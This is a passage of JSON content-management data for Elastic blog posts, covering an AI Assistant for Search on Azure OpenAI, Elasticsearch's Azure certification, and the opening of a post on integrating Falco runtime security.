12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0899a26be1b01f55"}}},{"image":{"image":{"uid":"bltefc70ee7f93eb690","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T02:38:38.040Z","created_by":"bltb6c155cd84fc0c1a","file_size":"89722","filename":"image1.png","parent_uid":null,"tags":[],"title":"image1.png","updated_at":"2024-11-18T02:38:38.040Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-18T14:00:02.226Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltefc70ee7f93eb690/673aa8ae6e6b7ccbdf0fef8c/image1.png"},"_metadata":{"uid":"cs8314d6e1880dd608"},"caption_l10n":"","alt_text_l10n":"connectors","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Bring your own data (or third-party data)","_metadata":{"uid":"cs581f0a1239412218"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith Elastic AI Assistant, you can customize the experience by pulling in data from your own sources or adding external information via Elastic’s web crawlers. This makes it easy to build a personalized help experience, especially when your organization relies on specific data beyond Elastic’s built-in resources.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Learn more about the Elastic AI Assistant for Search","_metadata":{"uid":"csbed8d866f140e7e6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic’s new AI Assistant for Search — powered by Microsoft AI Services — will be available in \u003c/span\u003e\u003ca href=\"http://www.elastic.co/blog/elastic-cloud-serverless-microsoft-azure\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Serverless\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e coming soon. It will offer developers a built-in, task-oriented help center to boost productivity and engagement. To learn more about the Elastic AI Assistant for Search, please visit the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-search-8-16-0\"\u003e\u003cspan style='font-size: 12pt;'\u003e8.16 blog announcement\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eJoin us at the Microsoft Ignite conference in Chicago on November 18, 2024, where we’ll showcase how this new tool can transform search and knowledge management for developers.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1dee181943425018"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs94411f12390a5c80"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs20326b7539c05e8b"}}}],"publish_date":"2024-11-18","sanity_migration_complete":false,"seo":{"seo_title_l10n":"New! Empowering developers with Elastic’s AI Assistant for Search and Azure OpenAI","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltefbcf6957c5e689a","ACL":{},"created_at":"2023-11-06T20:35:45.445Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-search","label_l10n":"Cloud search","tags":[],"title":"Cloud search","updated_at":"2023-11-06T20:35:45.445Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:50.742Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt8617d65f559b9a82","ACL":{},"created_at":"2023-11-06T20:42:46.365Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"microsoft-azure","label_l10n":"Microsoft Azure","tags":[],"title":"Microsoft Azure","updated_at":"2023-11-06T20:42:46.365Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:19.197Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt226f04bb0dd0936b","ACL":{},"created_at":"2023-11-06T20:46:35.144Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"personalization","label_l10n":"Personalization","tags":[],"title":"Personalization","updated_at":"2023-11-06T20:46:35.144Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:12.713Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt49d4b623ebdfdd90","ACL":{},"created_at":"2022-09-13T16:43:19.010Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2022-09-13T16:43:19.010Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.239Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt1f91412665193558","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-18T02:34:47.423Z","created_by":"bltb6c155cd84fc0c1a","file_size":"24382","filename":"144760---2nd-Batch-of-10-GAI-blog-header-images_04_(1).jpg","parent_uid":null,"tags":[],"title":"144760---2nd-Batch-of-10-GAI-blog-header-images_04 (1).jpg","updated_at":"2024-11-18T02:34:47.423Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-18T14:00:02.236Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1f91412665193558/673aa7c7f8d4ec02e9ce4c1d/144760---2nd-Batch-of-10-GAI-blog-header-images_04_(1).jpg"},"title":"0 to 60 with Elastic AI Assistant for Search and Azure OpenAI","title_l10n":"0 to 60 with Elastic AI Assistant for Search and Azure OpenAI","updated_at":"2024-11-18T02:41:24.045Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-ai-assistant-for-search-azure-openai","publish_details":{"time":"2024-11-18T14:00:02.198Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltc66f702493e640c3","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic has achieved another significant milestone by becoming a Certified Software Solution for Microsoft Azure. This rigorous validation process ensures that Elastic adheres to Microsoft’s high standards for security, performance, and reliability.","author":["blt3f02e05e41c2a581"],"category":["bltc17514bfdbc519df"],"created_at":"2024-11-18T02:24:20.056Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs99912ac76f94ca60"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs a trusted partner in the Microsoft ecosystem, Elasticsearch has achieved another significant milestone by becoming a Certified Software Solution for Microsoft Azure. This certification not only underscores our commitment to excellence but also reflects our dedication to delivering seamless data solutions for our customers. Elasticsearch’s new status as a Certified Software Solution validates its robust, native integration within the Azure cloud — enhancing data search, observability, and security for organizations relying on Microsoft’s cloud infrastructure.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What this means for Elasticsearch users","_metadata":{"uid":"csdc64ef463c1e6678"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBeing a Certified Software Solution for Azure means that Elasticsearch has passed rigorous testing and validation processes — ensuring our product adheres to Microsoft’s high standards for security, performance, and reliability. Our certified status offers you peace of mind when selecting cloud-native solutions for your critical applications. By achieving this designation, Elasticsearch has joined an exclusive group of applications that meet Microsoft’s stringent criteria, ensuring a fully optimized experience for organizations operating on the Azure cloud.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfaf9b0ea9309b344"}}},{"image":{"image":{"uid":"blte3ae5e544dfc67be","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T02:22:13.445Z","created_by":"bltb6c155cd84fc0c1a","file_size":"536289","filename":"image1.png","parent_uid":null,"tags":[],"title":"image1.png","updated_at":"2024-11-18T02:22:13.445Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-18T14:00:01.778Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte3ae5e544dfc67be/673aa4d5c05fcbd18acf0df4/image1.png"},"_metadata":{"uid":"csfea9d7adba3474e7"},"caption_l10n":"","alt_text_l10n":"elasticsearch azure native isv service","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Benefits of Elasticsearch’s Azure-certified solution","_metadata":{"uid":"csb0c116a063c9d1c6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe certification as a native Azure solution not only simplifies integration for current and new customers but also brings a host of benefits, including:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSeamless deployment:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Available directly in the Azure Marketplace, Elasticsearch allows you to easily deploy and integrate our solution within your Azure environment. The entire deployment process is streamlined to minimize setup time, enabling your teams to focus on extracting insights from your data faster.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEnhanced security and compliance:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Certified solutions are trusted by Microsoft to meet enterprise-level compliance standards, providing you with robust security controls in alignment with Azure’s regulatory requirements.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eOptimized performance on Azure:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e As a native integration within Azure, Elasticsearch uses Azure’s infrastructure to provide optimized performance and scalability. You can scale your search, analytics, and observability functions without worrying about the technical complexities of managing infrastructure.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Streamlined access via the Azure Marketplace","_metadata":{"uid":"cs50224677bda2702e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.ec-azure-pp?tab=Overview\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch is accessible in the Azure Marketplace\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — Microsoft’s centralized platform for cloud-native solutions. This placement allows you to directly provision Elasticsearch within your existing Azure subscription, simplifying billing and account management while eliminating the need for separate agreements or licenses. With everything managed in one place, you can achieve greater control and visibility over your cloud resources.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The power of native integration for real-time insights","_metadata":{"uid":"cs627f47e7637e9b12"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch’s native integration with Azure means that you can access Elasticsearch’s advanced search and analytics capabilities without leaving your Azure environment. This enables real-time monitoring, reporting, and insights across diverse data sources within an Azure-native ecosystem. Our integration provides seamless data ingestion from various Azure services, unlocking new opportunities for observability and security use cases.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhether you are looking to enhance your organization’s search capabilities, gain visibility into your infrastructure, or deploy data-driven applications at scale, Elasticsearch’s Azure-certified solution delivers the power and reliability you need — all within the comfort of the Azure cloud.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"A future of innovation with Microsoft Azure","_metadata":{"uid":"csc323694b6c9dea8d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic is committed to ongoing innovation within the Azure ecosystem. Our team is actively working on feature enhancements and additional integrations that will provide more functionality for Azure users. With our shared focus on innovation and customer-centric solutions, we are excited to continue growing alongside the Microsoft ecosystem and expanding our capabilities to better serve organizations worldwide.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Explore Elasticsearch in the Azure Marketplace today","_metadata":{"uid":"cs7f13c1348771461f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe invite organizations and partners to explore the benefits of our certified integration on Azure. Elasticsearch’s presence in the Azure Marketplace reflects our dedication to a user-friendly, secure, and high-performance experience in the cloud. Accessing Elasticsearch’s powerful search and analytics features has never been easier — or more secure.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo get started, visit our \u003c/span\u003e\u003ca href=\"https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.ec-azure-pp?tab=Overview\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003esolution page in the Azure Marketplace\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. See how Elasticsearch can transform the way you handle data, unlock insights, and drive efficiency across your Azure environment.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5213b58739ba20fa"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs15fc5c764ac3dfe5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cscab8922071cea91c"}}}],"publish_date":"2024-11-18","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elasticsearch: Certified Software Solution on Microsoft Azure","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[{"uid":"bltada2311dae66943e","_content_type_uid":"tags_partner"}],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltefbcf6957c5e689a","ACL":{},"created_at":"2023-11-06T20:35:45.445Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-search","label_l10n":"Cloud search","tags":[],"title":"Cloud search","updated_at":"2023-11-06T20:35:45.445Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:50.742Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","title":"Search analytics","label_l10n":"Search analytics","keyword":"search-analytics","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt6c991eb897ec7277","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:30:57.427Z","updated_at":"2023-11-06T21:30:57.427Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T12:28:49.147Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt4f7e02463a803fc1","ACL":{},"created_at":"2023-11-06T20:35:19.646Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-native","label_l10n":"Cloud native","tags":[],"title":"Cloud native","updated_at":"2023-11-06T20:35:19.646Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:35:54.838Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt8617d65f559b9a82","ACL":{},"created_at":"2023-11-06T20:42:46.365Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"microsoft-azure","label_l10n":"Microsoft Azure","tags":[],"title":"Microsoft Azure","updated_at":"2023-11-06T20:42:46.365Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:19.197Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt639477b9562a2018","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-18T02:21:03.439Z","created_by":"bltb6c155cd84fc0c1a","file_size":"129412","filename":"fluffy_clouds.jpg","parent_uid":null,"tags":[],"title":"fluffy clouds.jpg","updated_at":"2024-11-18T02:21:03.439Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-18T14:00:01.791Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt639477b9562a2018/673aa48f370c541ebbf94a03/fluffy_clouds.jpg"},"title":"Elasticsearch achieves Certified Software Solution status for Microsoft Azure","title_l10n":"Elasticsearch achieves Certified Software Solution status for Microsoft Azure","updated_at":"2024-11-18T02:25:49.502Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elasticsearch-certified-software-solution-microsoft-azure","publish_details":{"time":"2024-11-18T14:00:01.746Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt0c54a58b669f541d","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Security introduces extended cloud protections, integrating CNCF open source tools. Falco for runtime security enhances Cloud Detection and Response capabilities, offering flexible integration options and centralized analysis.","author":["bltf79747ba548dc6e3"],"category":["bltb79594af7c5b4199"],"created_at":"2024-11-12T20:04:43.021Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6276e66ba90cd8f7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn today's rapidly evolving cloud landscape, robust security measures are more critical than ever. At Elastic Security, we're excited to introduce our extended protections for cloud — a key component of our cloud detection and response (CDR) use case. This initiative seamlessly integrates \u003c/span\u003e\u003ca href=\"https://landscape.cncf.io/?group=projects-and-products\u0026view-mode=grid\u0026tag=security\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eopen source security tools\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e from the \u003c/span\u003e\u003ca href=\"https://landscape.cncf.io/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eCloud Native Computing Foundation (CNCF) ecosystem\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e with Elastic Security's powerful analytics platform.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Embracing the CNCF open source security landscape","_metadata":{"uid":"cs870a09bb3c3d6913"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe CNCF has fostered a rich ecosystem of open source security tools designed specifically for cloud-native architectures. These tools offer unparalleled flexibility, cost efficiency, and vendor neutrality, making them ideal for modern cloud infrastructures. By integrating these tools with Elastic Security, we're combining specialized security capabilities with a robust, centralized analytics platform.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur initial focus is on cloud workload protection and runtime security tools, starting with the integration of \u003c/span\u003e\u003ca href=\"https://falco.org/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eFalco\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. In future releases, we plan to expand our integrations to include other powerful CNCF tools, such as \u003c/span\u003e\u003ca href=\"https://tetragon.io/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eTetragon\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://kubearmor.io/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eKubeArmor\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Falco: A powerful ally in cloud workload protection","_metadata":{"uid":"cs9640ddb7d80da4de"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFalco — an open source cloud native runtime security project — excels at detecting and alerting on suspicious behavior at the edge, whether in Kubernetes clusters, Linux virtual machines, or bare metal servers. By integrating Falco with Elastic Security, we're addressing several critical challenges faced by security teams.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Key benefits of integration","_metadata":{"uid":"cs56e55991b70c088b"},"header_style":"H3","paragraph_l10n":"\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEdge detection:\u003c/strong\u003e\u003c/span\u003e\u003cspan 